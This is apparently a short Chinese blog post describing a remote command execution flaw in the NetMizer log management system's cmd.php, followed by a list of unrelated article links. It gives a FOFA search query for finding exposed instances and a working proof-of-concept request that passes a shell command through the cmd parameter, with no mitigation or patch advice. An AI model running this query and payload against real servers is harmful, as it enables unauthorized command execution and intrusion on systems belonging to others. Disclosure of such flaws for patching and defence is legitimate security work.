当前位置: 首页 > article >正文

NetMizer-日志管理系统-远程命令执行漏洞挖掘

article 2025/3/31 20:15:22

漏洞描述:NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞,攻击者通过传入 cmd参数即可命令执行

1.fofa搜素语句

title="NetMizer 日志管理系统"

2.漏洞验证

网站页面

验证POC

/data/manage/cmd.php?cmd=id

 

 


http://www.kler.cn/a/612710.html

相关文章:

  • 经典优化算法:遗传算法(Genetic Algorithm, GA)
  • Python正则表达式(二)
  • docker中安装 python
  • GPT-SoVITS本地部署:低成本实现语音克隆远程生成音频全流程实战
  • 课程5. 机器学习的核心方法
  • 简单介绍My—Batis
  • 亚马逊云科技全面托管DeepSeek-R1模型现已上线
  • 解决 Gin Web 应用中 Air 热部署无效的问题
  • pyqt第一个窗口程序
  • el-table下的复选框关联勾选
  • 【leetcode hot 100 74】搜索二维矩阵
  • 我的创作纪念日——三周年
  • [识记]Mysql8 远程授权
  • 北斗导航 | 改进奇偶矢量法的接收机自主完好性监测算法原理,公式,应用,RAIM算法研究综述,matlab代码
  • redis部署架构
  • Python----计算机视觉处理(Opencv:直方图均衡化)
  • python之并发编程
  • Vue3 实战:基于 mxGraph 与 WebSocket 的动态流程图构建
  • AugFPN
  • 【Git 暂存操作与升级应用指南】